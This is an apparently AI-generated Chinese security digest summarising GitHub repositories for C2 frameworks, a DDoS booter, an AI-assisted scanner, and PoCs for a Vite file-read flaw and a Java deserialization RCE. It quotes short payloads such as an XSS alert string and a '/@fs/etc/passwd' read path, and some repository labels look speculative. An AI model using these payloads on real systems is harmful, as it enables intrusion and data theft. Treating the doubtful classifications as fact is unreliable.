|
|
|
|||
|
|
> client.py: 增加了新的功能和命令,例如网络扫描等
|
|||
|
|
|
|||
|
|
> compile.py: 使用pyinstaller编译client.py为独立的可执行文件,并可以选择是否开启debug模式
|
|||
|
|
|
|||
|
|
> server.py: 增加了新的功能,例如黑名单功能
|
|||
|
|
|
|||
|
|
> start.py: 安装依赖并启动服务端
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• client.py
|
|||
|
|
• server.py
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该C2框架更新了客户端和服务端功能,增加了编译功能,使得部署和使用更加便捷。C2框架本身就属于安全风险较高的工具,功能增强和编译功能的增加,使得潜在的恶意利用更加容易。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### PhoenixC2 - PhoenixC2: DDoS/Booter框架
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [PhoenixC2](https://github.com/lilroniel/PhoenixC2) |
|
|||
|
|
| 风险等级 | `HIGH` |
|
|||
|
|
| 安全类型 | `漏洞利用` |
|
|||
|
|
| 更新类型 | `SECURITY_IMPROVEMENT` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **1**
|
|||
|
|
- 变更文件数: **1**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
PhoenixC2是一个用于DDoS攻击的C2框架。本次更新仅修改了README.md文件,更新了下载链接中的版本号。由于该项目涉及C2框架,且README中明确提到了DDoS攻击相关内容,因此本次更新虽然简单,但仍具有一定的安全相关性。C2框架本身即是攻击的基础设施,更新下载链接的版本号可能意味着对底层实现进行了一定的修改,具体影响需要进一步分析。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | PhoenixC2是一个DDoS攻击框架。 |
|
|||
|
|
| 2 | 更新了README.md文件中的下载链接。 |
|
|||
|
|
| 3 | 下载链接的版本号已更新,可能涉及底层代码的修改。 |
|
|||
|
|
| 4 | C2框架本身具有较高的安全风险。 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 更新了README.md文件中下载链接的软件版本号,从v1.0更新为v2.0。
|
|||
|
|
|
|||
|
|
> 由于是C2框架,更新可能涉及命令控制、攻击流量生成等关键功能的修改。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• PhoenixC2框架
|
|||
|
|
• DDoS攻击相关组件
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
C2框架本身具有攻击属性,更新版本号可能涉及关键功能修改,存在安全风险。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### ai-security - AI辅助Web应用漏洞扫描工具
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [ai-security](https://github.com/mayanklau/ai-security) |
|
|||
|
|
| 风险等级 | `MEDIUM` |
|
|||
|
|
| 安全类型 | `安全功能` |
|
|||
|
|
| 更新类型 | `SECURITY_IMPROVEMENT` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **3**
|
|||
|
|
- 变更文件数: **3**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库是一个基于AI的Web应用漏洞扫描工具。主要功能包括:生成payload,使用GPT进行payload标注。更新内容是Python脚本,用于顺序运行各种安全工具,并添加了一个用于执行安全工具的菜单脚本。 本次更新中,payload 生成和标记成功。但是,输出的JSON文件内容显示了payload生成以及GPT标记的结果。 其中包括了`<script>alert(1)</script>`这种XSS payload,但是标记结果是报错信息,并且没有成功进行标注。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | Web应用漏洞扫描工具,集成多种安全工具。 |
|
|||
|
|
| 2 | 使用AI生成Payload,并进行标记。 |
|
|||
|
|
| 3 | 更新了脚本,顺序执行扫描工具,添加菜单。 |
|
|||
|
|
| 4 | 生成的payload包含XSS payload。 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 该项目集成了Nmap、SQLMap、WhatWeb、XSStrike、Wfuzz等多种安全工具,并通过python脚本进行调用。
|
|||
|
|
|
|||
|
|
> 使用GPT对生成的payload进行标记,但本次更新中GPT标记失败。
|
|||
|
|
|
|||
|
|
> 生成了包含XSS Payload的Payload。
|
|||
|
|
|
|||
|
|
> 修改了output/payloads_tagged.json文件,添加payload和tag。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• Python脚本
|
|||
|
|
• 集成安全工具(Nmap, SQLMap, WhatWeb, XSStrike, Wfuzz等)
|
|||
|
|
• GPT API (理论上)
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
虽然GPT标记失败,但生成了XSS payload,显示了利用AI生成payload的可能性,并且项目集成了多个安全工具,具有一定的研究价值。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### CVE-2025-31125 - Vite任意文件读取漏洞POC
|
|||
|
|
|
|||
|
|
#### 📌 漏洞信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| CVE编号 | CVE-2025-31125 |
|
|||
|
|
| 风险等级 | `HIGH` |
|
|||
|
|
| 利用状态 | `POC可用` |
|
|||
|
|
| 发布时间 | 2025-04-01 00:00:00 |
|
|||
|
|
| 最后更新 | 2025-04-01 14:25:48 |
|
|||
|
|
|
|||
|
|
#### 📦 相关仓库
|
|||
|
|
|
|||
|
|
- [CVE-2025-31125](https://github.com/sunhuiHi666/CVE-2025-31125)
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库提供了一个针对Vite任意文件读取漏洞(CVE-2025-31125)的检测工具。仓库包含一个Python脚本(main.py)用于检测目标Vite服务器是否存在该漏洞,通过构造特定路径尝试读取敏感文件。脚本支持单目标和批量检测,并将结果输出到result.txt和full_log.json文件。代码变更主要体现在添加了README.md文档、ips.txt、requirements.txt、main.py以及result.txt和full_log.json文件,其中main.py是核心的漏洞检测脚本,README.md详细介绍了工具的功能、使用方法、注意事项和免责声明。漏洞利用方式是通过构造特殊的URL路径,例如/@fs/etc/passwd,触发Vite服务器的文件读取功能。脚本会发送HTTP请求,检查响应内容,如果发现base64编码的敏感文件内容,则判定漏洞存在。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | Vite 任意文件读取漏洞 |
|
|||
|
|
| 2 | 提供POC验证工具 |
|
|||
|
|
| 3 | 支持单目标和批量检测 |
|
|||
|
|
| 4 | 可读取/etc/passwd和windows/win.ini等敏感文件 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 漏洞原理:Vite配置不当导致文件读取漏洞,攻击者构造特定URL路径,利用Vite的文件访问机制读取服务器上的任意文件。
|
|||
|
|
|
|||
|
|
> 利用方法:使用提供的main.py脚本,输入目标URL进行检测。脚本构造包含/@fs/的URL路径,尝试读取敏感文件。如果返回base64编码的敏感文件内容,则证明漏洞存在。
|
|||
|
|
|
|||
|
|
> 修复方案:升级Vite版本,检查并修改Vite的配置,限制对文件系统的访问权限。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• Vite
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该漏洞允许攻击者读取服务器上的任意文件,包括敏感信息,如/etc/passwd或windows/win.ini等,可能导致信息泄露。并且该项目提供了POC,方便复现和验证漏洞。影响范围虽然不明确,但文件读取漏洞属于高危漏洞。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### CVE-2025-31129 - Java反序列化漏洞,RCE
|
|||
|
|
|
|||
|
|
#### 📌 漏洞信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| CVE编号 | CVE-2025-31129 |
|
|||
|
|
| 风险等级 | `CRITICAL` |
|
|||
|
|
| 利用状态 | `漏洞利用可用` |
|
|||
|
|
| 发布时间 | 2025-04-01 00:00:00 |
|
|||
|
|
| 最后更新 | 2025-04-01 13:58:09 |
|
|||
|
|
|
|||
|
|
#### 📦 相关仓库
|
|||
|
|
|
|||
|
|
- [CVE-2025-31129](https://github.com/cwm1123/CVE-2025-31129)
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库包含针对CVE-2025-31129的漏洞利用代码。仓库主要包含以下内容:
|
|||
|
|
|
|||
|
|
1. `README.md`: 包含CVE编号和简要说明。
|
|||
|
|
2. `pom.xml`: Maven配置文件,引入了`commons-collections`依赖,版本为3.2.1。
|
|||
|
|
3. `src/main/java/compile.java`: 一个简单的编译完成提示文件,内容为`System.out.println("Compile completed");`。
|
|||
|
|
4. `src/main/java/org/apache/commons/collections/functors/evil.java`: 包含恶意代码,通过`Runtime.getRuntime().exec("calc")`触发calc计算器,用于验证漏洞。
|
|||
|
|
5. `src/main/java/org/example/Main.java`: 核心的漏洞利用代码。该文件实现了针对Java反序列化漏洞的攻击,使用了`commons-collections`库的类和方法构造了一个恶意payload,触发RCE。代码中包含`serialize()`方法用于生成payload,`patchModule`方法用于绕过模块化限制, `Main.main()`方法是漏洞利用的入口。
|
|||
|
|
|
|||
|
|
最新提交的代码变更集中在添加上述文件,特别是`src/main/java/org/example/Main.java`,该文件包含了完整的漏洞利用代码。该漏洞利用基于commons-collections库,通过构造`ChainedTransformer`,`ConstantTransformer`,`InvokerTransformer`等类实现代码执行,并包含绕过模块化限制的代码。
|
|||
|
|
|
|||
|
|
漏洞利用方式:
|
|||
|
|
1. 序列化恶意对象。
|
|||
|
|
2. 通过反序列化触发RCE。代码中使用calc计算器作为验证。
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 利用Java反序列化漏洞,实现远程代码执行(RCE)。 |
|
|||
|
|
| 2 | 使用commons-collections库构造恶意payload。 |
|
|||
|
|
| 3 | 包含完整的漏洞利用代码和示例。 |
|
|||
|
|
| 4 | 针对Java环境,具有较高的实用性。 |
|
|||
|
|
| 5 | 利用了Java中的反序列化机制,构造了恶意对象,在反序列化时触发代码执行 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 漏洞原理:Java应用程序在处理反序列化对象时,如果未正确处理用户输入,攻击者可以构造恶意的序列化对象,在反序列化时执行任意代码。
|
|||
|
|
|
|||
|
|
> 利用方法:通过构造恶意的序列化对象,结合commons-collections库中的类和方法,实现远程代码执行(RCE)。示例代码中使用了Transformer链,InvokerTransformer调用Runtime.exec("calc")。
|
|||
|
|
|
|||
|
|
> 修复方案:升级commons-collections库到安全版本。对用户输入进行严格的校验和过滤。禁用不安全的类和方法。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• Java
|
|||
|
|
• commons-collections
|
|||
|
|
• Java反序列化机制
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该漏洞具有完整的PoC,可以直接用于RCE。且描述清晰,利用方式明确,影响Java应用程序的安全性。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### datacon-2024-bug - datacon 2024 漏洞分析与实现
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [datacon-2024-bug](https://github.com/MelonHunters/datacon-2024-bug) |
|
|||
|
|
| 风险等级 | `MEDIUM` |
|
|||
|
|
| 安全类型 | `安全研究` |
|
|||
|
|
| 更新类型 | `新增代码` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **1**
|
|||
|
|
- 变更文件数: **7**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库是针对 datacon 2024 比赛中漏洞的实现,基于 0817iotg 战队的解题思路,使用了 langgraph。仓库的主要功能是漏洞分析和复现。 此次更新包括了README.md,bug_workflow.py,main.py,model.py,prompts.py,requirements.txt,utils.py等文件。 尽管项目尚未完全实现,且处于开发阶段,但其目标是复现漏洞,并且使用了最新的Langchain框架,具备一定的研究价值。 由于`vote`逻辑尚未实现,因此无法直接进行漏洞利用,但其提供了对漏洞分析和实现的参考,具有一定的学习和研究意义。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 基于Langgraph实现漏洞分析与复现 |
|
|||
|
|
| 2 | 提供了 datacon 2024 漏洞的解题思路参考 |
|
|||
|
|
| 3 | 涉及 CVE 漏洞信息提取、分析 |
|
|||
|
|
| 4 | 使用了Langchain框架,便于学习和研究 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 使用 Langgraph 构建漏洞分析流程
|
|||
|
|
|
|||
|
|
> 涉及CVE ID,厂商,编程语言,危险函数等信息的提取
|
|||
|
|
|
|||
|
|
> 利用 Langchain 框架进行 prompt 构建和响应解析
|
|||
|
|
|
|||
|
|
> 包含提取JSON数据的工具函数
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• 涉及的漏洞分析对象,具体需根据漏洞类型确定
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该仓库与“漏洞”关键词高度相关,主要目的是安全研究。 仓库提供了datacon 2024 漏洞分析的实现,虽然项目未完成,但是提供了思路和技术实现,具有一定的参考价值。 基于 Langchain 实现,具有一定的创新性。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### H2025_TCH099_03_A_C2 - C2框架, 终端命令增强
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [H2025_TCH099_03_A_C2](https://github.com/justinfiset/H2025_TCH099_03_A_C2) |
|
|||
|
|
| 风险等级 | `MEDIUM` |
|
|||
|
|
| 安全类型 | `安全功能` |
|
|||
|
|
| 更新类型 | `SECURITY_IMPROVEMENT` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **5**
|
|||
|
|
- 变更文件数: **5**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库是一个C2框架,主要通过终端命令进行交互。本次更新主要集中在终端命令的增强和管理员功能完善。更新内容包括管理员登录后的命令增加(创建管理员、调试等),以及对现有命令的改进。没有发现直接的安全漏洞利用代码,但由于是C2框架,其本身的安全配置和命令执行逻辑对安全性有很大影响。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | C2框架,通过终端命令交互 |
|
|||
|
|
| 2 | 新增管理员命令:创建管理员、调试等 |
|
|||
|
|
| 3 | 改进了现有命令 |
|
|||
|
|
| 4 | 涉及身份验证和权限管理 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 终端命令解析和执行逻辑
|
|||
|
|
|
|||
|
|
> 管理员身份验证和授权机制
|
|||
|
|
|
|||
|
|
> JavaScript代码实现
|
|||
|
|
|
|||
|
|
> 使用localStorage存储用户token
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• terminal.js
|
|||
|
|
• 用户身份验证模块
|
|||
|
|
• C2框架核心功能
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
C2框架的更新,新增了管理员命令,涉及身份验证和权限管理,如果存在设计或实现缺陷,可能导致安全风险。此外,C2框架本身就具有攻击属性,此类更新值得关注。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### portal_c2_demo - 跨平台C2框架,支持gRPC通信
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [portal_c2_demo](https://github.com/drakeaxelrod/portal_c2_demo) |
|
|||
|
|
| 风险等级 | `HIGH` |
|
|||
|
|
| 安全类型 | `安全工具` |
|
|||
|
|
| 更新类型 | `功能更新` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **3**
|
|||
|
|
- 变更文件数: **40**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库是一个C2框架,名为Portal,使用Go、gRPC和Wails构建。它提供了管理远程代理的现代、高效和安全的方式,并具有用户界面。更新内容包括:
|
|||
|
|
|
|||
|
|
1. 新增cmd/server/api.go文件,该文件定义了API结构体,用于提供给Wails前端调用的方法,包括获取agent列表。
|
|||
|
|
2. cmd/server/main.go:修改了服务器启动方式,增加了CORS中间件的支持,以及WebSocket连接的升级和处理逻辑,新增了api的路由注册。
|
|||
|
|
3. cmd/agent/main.go:修改了agent启动时连接C2服务器的逻辑,添加了调试日志输出,并添加了Agent注册流程。该文件现在设置了信号处理,用于优雅关闭。
|
|||
|
|
4. pkg/agent/agent.go:增加了对shell命令的支持,实现shell交互能力,agent现在可以执行shell命令,并且支持了stdout和stderr的读取。
|
|||
|
|
5. pkg/server/server.go:修改了Agent注册流程,添加了对Agent重连的检测与处理。增加了对命令队列的处理,从而提升C2的交互能力。
|
|||
|
|
6. proto/c2.proto文件更新,添加了Agent IP地址信息,并更新了心跳请求和响应。
|
|||
|
|
7. 前端代码更新:添加了对终端的支持,以及路由功能,从而完善了UI的功能。
|
|||
|
|
8. run.sh脚本: 提供了一个用于快速启动C2服务器和agent的脚本。
|
|||
|
|
|
|||
|
|
该项目整体功能完善,可作为红队C2框架进行评估。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | 实现了跨平台的C2框架,支持Windows、Linux和macOS。 |
|
|||
|
|
| 2 | 使用gRPC进行通信,实现了双向流,提高了效率。 |
|
|||
|
|
| 3 | 提供了基于Wails和React的现代UI,改善了用户体验。 |
|
|||
|
|
| 4 | 增加了shell交互功能,提升了可操作性。 |
|
|||
|
|
| 5 | 增加了Agent注册机制,提升了整体的框架鲁棒性。 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> C2框架使用Go语言开发,并使用gRPC进行通信。
|
|||
|
|
|
|||
|
|
> Agent端实现了shell命令的执行,增强了交互性。
|
|||
|
|
|
|||
|
|
> 服务器端增加了CORS的支持,并实现了Websocket的连接和处理。
|
|||
|
|
|
|||
|
|
> 使用Wails构建前端UI,前端基于React框架。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• C2 Server
|
|||
|
|
• C2 Agent
|
|||
|
|
• gRPC通信
|
|||
|
|
• Wails UI
|
|||
|
|
• Shell交互
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
该仓库是一个功能完善的C2框架,与C2关键词高度相关。它实现了跨平台支持、gRPC通信、现代UI和shell交互,具备安全研究和渗透测试价值。更新内容增强了框架的功能性和交互性,值得关注。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
### C2S-Tienda - C2框架Tienda,权限绕过风险
|
|||
|
|
|
|||
|
|
#### 📌 仓库信息
|
|||
|
|
|
|||
|
|
| 属性 | 详情 |
|
|||
|
|
|------|------|
|
|||
|
|
| 仓库名称 | [C2S-Tienda](https://github.com/PetermCarvajal/C2S-Tienda) |
|
|||
|
|
| 风险等级 | `MEDIUM` |
|
|||
|
|
| 安全类型 | `安全功能` |
|
|||
|
|
| 更新类型 | `SECURITY_IMPROVEMENT` |
|
|||
|
|
|
|||
|
|
#### 📊 代码统计
|
|||
|
|
|
|||
|
|
- 分析提交数: **5**
|
|||
|
|
- 变更文件数: **8**
|
|||
|
|
|
|||
|
|
#### 💡 分析概述
|
|||
|
|
|
|||
|
|
该仓库是一个C2框架,名为Tienda,主要功能是用户认证和管理。最近的更新主要涉及了对CORS配置、用户权限的调整,以及新增了获取所有用户信息的API接口。虽然整体上属于功能完善,但权限配置和API的调整,存在潜在的安全风险。具体来说,在AuthController中新增了获取所有用户信息的接口/auth/users,这个接口允许ADMIN角色访问。由于权限控制设计不当,可能导致越权访问,例如未授权用户可能通过其他途径伪装成ADMIN,从而获取敏感的用户信息。
|
|||
|
|
|
|||
|
|
#### 🔍 关键发现
|
|||
|
|
|
|||
|
|
| 序号 | 发现内容 |
|
|||
|
|
|------|----------|
|
|||
|
|
| 1 | C2框架,Tienda,实现用户认证和管理 |
|
|||
|
|
| 2 | 新增/auth/users API, 提供获取所有用户信息的功能 |
|
|||
|
|
| 3 | 安全配置变更:CORS配置允许跨域访问, 权限配置调整 |
|
|||
|
|
| 4 | 潜在的越权访问风险,ADMIN用户权限控制不当 |
|
|||
|
|
|
|||
|
|
#### 🛠️ 技术细节
|
|||
|
|
|
|||
|
|
> 新增了/auth/users API,用于获取所有用户信息,仅限ADMIN角色访问。
|
|||
|
|
|
|||
|
|
> 在SecurityConfig中配置了权限控制,/auth/users需要ADMIN权限。
|
|||
|
|
|
|||
|
|
> CORS配置中允许来自http://localhost:8080的跨域请求,并允许所有HTTP方法和标头。
|
|||
|
|
|
|||
|
|
> 风险:由于权限控制过于简单,可能导致未授权用户通过伪装身份等方式访问/auth/users接口,从而泄露敏感信息。
|
|||
|
|
|
|||
|
|
|
|||
|
|
#### 🎯 受影响组件
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
• AuthController
|
|||
|
|
• SecurityConfig
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
#### ⚡ 价值评估
|
|||
|
|
|
|||
|
|
<details>
|
|||
|
|
<summary>展开查看详细评估</summary>
|
|||
|
|
|
|||
|
|
新增的API接口和权限配置变更,引入了越权访问的潜在风险。未授权用户可能通过身份伪造或其他手段,绕过权限控制,访问敏感的用户信息。
|
|||
|
|
</details>
|
|||
|
|
|
|||
|
|
---
|
|||
|
|
|
|||
|
|
|
|||
|
|
## 免责声明
|
|||
|
|
本文内容由 AI 自动生成,仅供参考和学习交流。文章中的观点和建议不代表作者立场,使用本文信息需自行承担风险和责任。
|